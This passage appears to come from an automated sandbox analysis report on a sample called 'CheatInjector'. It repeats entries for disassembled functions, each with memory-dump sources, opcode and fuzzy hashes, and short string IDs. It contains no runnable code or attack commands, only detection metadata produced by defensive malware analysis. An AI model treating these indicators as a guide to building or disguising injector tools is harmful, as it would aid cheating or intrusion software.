                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,
                                                                • API String ID: 0-3772416878
                                                                • Opcode ID: bf2dafdcaa963125885b0f97c14b02481ca749e3dc2bc1ef36d36a61fc2f6c61
                                                                • Instruction ID: b4a59ddcbd96909523d6e42f5e89e5fcf3c09f7da02b47da9ad20ba03a02829c
                                                                • Opcode Fuzzy Hash: bf2dafdcaa963125885b0f97c14b02481ca749e3dc2bc1ef36d36a61fc2f6c61
                                                                • Instruction Fuzzy Hash: 03A17B712093859FD325CF28C98476BBBE1AFA5304F444E2DE5D587782C235DA18CBA7
                                                                Function 0051F821 Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: GJSG
                                                                • API String ID: 0-597978410
                                                                • Opcode ID: 8f867a6c0867589ae3c2d665ea57d41d27e4f286d58e18cc41b528cac8e11522
                                                                • Instruction ID: a2a376927941d69ac70a7ee5e3999168067c41dfc510aacba8c290205fea37cf
                                                                • Opcode Fuzzy Hash: 8f867a6c0867589ae3c2d665ea57d41d27e4f286d58e18cc41b528cac8e11522
                                                                • Instruction Fuzzy Hash: A17192F0105B858AE7228F3484507E3BFE1BF97344F098AADD5EA5B283C3356546CB69
                                                                Function 00518990 Relevance: 1.5, Strings: 1, Instructions: 225COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #
                                                                • API String ID: 0-1983530799
                                                                • Opcode ID: ddf8493c22b478c1cab332214f73fca41b238a0d95a775fc360c30c7369f7739
                                                                • Instruction ID: 881e933c86b014b44fc59336aee2186447a929bb2c6347f8feddf406f5bb41b5
                                                                • Opcode Fuzzy Hash: ddf8493c22b478c1cab332214f73fca41b238a0d95a775fc360c30c7369f7739
                                                                • Instruction Fuzzy Hash: AE61FFB05083408BD7249F25D89276BBFE1FF82324F148A1CF4D64B291E7788945CB57
                                                                Function 00520059 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: [-hf
                                                                • API String ID: 0-69773262
                                                                • Opcode ID: 0f47527021f5b31dbad31a862dff5f1d48a323fdbaccb8ead2a941319d3780a3
                                                                • Instruction ID: 7dcfb8035be43011f60b9751c1429b83164054d79fdbe0907b200c70431b13d1
                                                                • Opcode Fuzzy Hash: 0f47527021f5b31dbad31a862dff5f1d48a323fdbaccb8ead2a941319d3780a3
                                                                • Instruction Fuzzy Hash: 8F51DDB0505B818AE7268F3988517B3FFE1BF63300F1859ADD4D78B683D234A906CB65
                                                                Function 00532D70 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @
                                                                • API String ID: 0-2766056989
                                                                • Opcode ID: 0172aed367b444b8eb994d81a5f20b6c1aef48b4156de5ecb10f533e73f1e1bc
                                                                • Instruction ID: d38935ca5e9e1edf92874f812d87eaf836e2974f7b4b5819d9f8f16b9a676c6d
                                                                • Opcode Fuzzy Hash: 0172aed367b444b8eb994d81a5f20b6c1aef48b4156de5ecb10f533e73f1e1bc
                                                                • Instruction Fuzzy Hash: 074122B09083108BD700CF24D88677BBBE5FF95328F148A2CE4995B3A1E3359D05CB96
                                                                Function 0050CDF2 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: KJUT
                                                                • API String ID: 0-3147183306
                                                                • Opcode ID: da0b0338efacc663f62a1cbd7a5488db6c4d9dd315c2f21abd28ca655548b82e
                                                                • Instruction ID: c24106be5f84bfd84bc94632a7a47fd1763029cf1d59a4e9ab5ceb5028cf8a88
                                                                • Opcode Fuzzy Hash: da0b0338efacc663f62a1cbd7a5488db6c4d9dd315c2f21abd28ca655548b82e
                                                                • Instruction Fuzzy Hash: 8031E9352047018FD72ACB26DCC467ABB97FBAA310B5DC62DC08707662C734AC81DB44
                                                                Function 0052D370 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: KJUT
                                                                • API String ID: 0-3147183306
                                                                • Opcode ID: e0c3b3a2463451ad2515843a61adb6ff6256aa393a5f38485afac67f4c72abbf
                                                                • Instruction ID: 4253325291beaba817057b83e2bc677d0b877d60862fdf756fc0c670528229f6
                                                                • Opcode Fuzzy Hash: e0c3b3a2463451ad2515843a61adb6ff6256aa393a5f38485afac67f4c72abbf
                                                                • Instruction Fuzzy Hash: 1041D235504210ABDF21EF14EC84A6BBFB5FF96314F248829E89583191C771EC11DBA2
                                                                Function 004FDDD8 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: MK
                                                                • API String ID: 0-530836240
                                                                • Opcode ID: eed8fbe9d0ef99bca98193e3aee9bfca6d5b117b52adb2240fd66610095a4baf
                                                                • Instruction ID: 53337b6684dd5cea322cc565c178c212c2300a72437240e23649488f1018f7b5
                                                                • Opcode Fuzzy Hash: eed8fbe9d0ef99bca98193e3aee9bfca6d5b117b52adb2240fd66610095a4baf
                                                                • Instruction Fuzzy Hash: 8631F776641B018FD321CF69CC81393BBE3FB96314F09896DD5E69BA92D378B0068B40
                                                                Function 0050D45F Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: KJUT
                                                                • API String ID: 0-3147183306
                                                                • Opcode ID: 3926bf8b40e6d9815a6b31f10d8187d51a8cfef4f1a46d7cd4b13c7f50515bdd
                                                                • Instruction ID: ab93343f758bf0af87500d52edffb149fa069e63edab62f85013c0e1f0d69f35
                                                                • Opcode Fuzzy Hash: 3926bf8b40e6d9815a6b31f10d8187d51a8cfef4f1a46d7cd4b13c7f50515bdd
                                                                • Instruction Fuzzy Hash: 2031E3751047008FD729CF25D885A2ABBB2FFA6304F19C56DC48A0BBA6DB74E842CB50
                                                                Function 00533240 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @
                                                                • API String ID: 0-2766056989
                                                                • Opcode ID: cafadfc807aefa48060a8d15bbd8c6c7512dff7249c83b2098065e2dd78e44c7
                                                                • Instruction ID: ed0bc286813eb10e84fc8bcbb884d01884a40d9487e6113b4aa5a5121e23c4b3
                                                                • Opcode Fuzzy Hash: cafadfc807aefa48060a8d15bbd8c6c7512dff7249c83b2098065e2dd78e44c7
                                                                • Instruction Fuzzy Hash: CB31DB714083049BD310DF58D88166FBBF5FFA6314F148D2DEA988B290E7359908CB9A
                                                                Function 0050BC6A Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: KJUT
                                                                • API String ID: 0-3147183306
                                                                • Opcode ID: 9d009a1139118d0cf927ca6706c97db5a11b87aaee1bd46a8b9572701b2a7e7e
                                                                • Instruction ID: a1ee72d862b16ce101eef0dcf9e6bb0e8e93f6611bc23cc3161d273a49fb5597
                                                                • Opcode Fuzzy Hash: 9d009a1139118d0cf927ca6706c97db5a11b87aaee1bd46a8b9572701b2a7e7e
                                                                • Instruction Fuzzy Hash: 1F21E4356047028FE324CF25D8C6A2AB7E3FB55700F89C17CC09A8B6A2DB34E841CB54
                                                                Function 0051B75D Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Cb3
                                                                • API String ID: 0-2979551964
                                                                • Opcode ID: 1271eb9cd4b8e52538add877e33560a00a617fefb98400e70c579cd0fdb7cf95
                                                                • Instruction ID: b5849de7527736240e086eb6ab04de16438d172b42ea80db5d708a660b165348
                                                                • Opcode Fuzzy Hash: 1271eb9cd4b8e52538add877e33560a00a617fefb98400e70c579cd0fdb7cf95
                                                                • Instruction Fuzzy Hash: E1112C399193089FF305AF509C8167ABBE1FB96300F14583DD48593551E3759C809B46
                                                                Function 004C511C Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: MZx
                                                                • API String ID: 0-2575928145
                                                                • Opcode ID: b0d8786f731519d9ad394cf0f3578152110a28b82a0696284396267ca17fd760
                                                                • Instruction ID: edc8ca073c7ce9026a852472f2417b1135e0ece5d1c546a5638fac57729d04fb
                                                                • Opcode Fuzzy Hash: b0d8786f731519d9ad394cf0f3578152110a28b82a0696284396267ca17fd760
                                                                • Instruction Fuzzy Hash: AEE022B0A46244A7E3449A01CC0AB5B7BD8DBC1308F50C43EB4489B3C1DBF86908879A
                                                                Function 004FA700 Relevance: .8, Instructions: 808COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 61be07b73b00625598650d5a5cfbb6bcea8b1b3c8c64c00b39e6943c597a60f0
                                                                • Instruction ID: 840c1b24363264903530d31be294abbed55961f78a98daf7d111f6f1f21ec4a5
                                                                • Opcode Fuzzy Hash: 61be07b73b00625598650d5a5cfbb6bcea8b1b3c8c64c00b39e6943c597a60f0
                                                                • Instruction Fuzzy Hash: 8A52D5715083198BC725DF18E88027BB3E1FFC4314F25892EDA9A97381D739A865CB5B
                                                                Function 00512070 Relevance: .8, Instructions: 781COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 97b3a0096d74cc793b693eac5abfa4ce6678a7b898bc1a6fbc72108aaefdd93a
                                                                • Instruction ID: 163049d8d2b14eb3b2d10dcee6871dd0315857436dbcd24de40fa36cb94a86b5
                                                                • Opcode Fuzzy Hash: 97b3a0096d74cc793b693eac5abfa4ce6678a7b898bc1a6fbc72108aaefdd93a
                                                                • Instruction Fuzzy Hash: A5827BB0608B818ED326CF3C8845797BFD5AB5A314F084A5DE0EAC73D2C779A505C766
                                                                Function 004F59D0 Relevance: .7, Instructions: 674COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 45112bbf27239439f1acc58f7edbc4d0699178eb2dca17fb97b9a7a1d4d8270f
                                                                • Instruction ID: ec53381f4c73e0678f74dacb5f067dde4a5e4829dd7f9f1289091e1d65f7a759
                                                                • Opcode Fuzzy Hash: 45112bbf27239439f1acc58f7edbc4d0699178eb2dca17fb97b9a7a1d4d8270f
                                                                • Instruction Fuzzy Hash: DB52E4315087498FCB14CF14C0806BABBE1FF89314F198A6EFA9A57352D778E949CB85
                                                                Function 004F9BF0 Relevance: .7, Instructions: 670COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b4295f61d16b9fc86f61dff1a073fda0e194ed80b8be5710e89f5e5336fb344e
                                                                • Instruction ID: b41d5485b9d1c6ac6dc7bbab11fc3d3020833f684f13033316101f528983c3a4
                                                                • Opcode Fuzzy Hash: b4295f61d16b9fc86f61dff1a073fda0e194ed80b8be5710e89f5e5336fb344e
                                                                • Instruction Fuzzy Hash: 3A52B3B09087889FE735CF24C4847B7BBE1AB51314F14882EC6DA46BC2D27DA895C75B
                                                                Function 004F63F0 Relevance: .6, Instructions: 610COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936714789.0000000000541000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936734283.0000000000543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936755927.0000000000545000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4c0000_CheatInjector.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 33f2e2551be70ea602806d2402c8def9cf25c205d6d7e2f279993cf4cb5a451c
                                                                • Instruction ID: cd74bd5283dcf692c6a53125cf5bdff7f276d10fe2630489ed18af234fae36f6
                                                                • Opcode Fuzzy Hash: 33f2e2551be70ea602806d2402c8def9cf25c205d6d7e2f279993cf4cb5a451c
                                                                • Instruction Fuzzy Hash: 40422271915B188FC328CF29C69052ABBF1BF45710B614A2ED69787F90D73AF845CB18
                                                                Function 004F8B30 Relevance: .5, Instructions: 504COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                • Associated: 00000000.00000002.1936503537.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936527004.00000000004C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1936555354.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
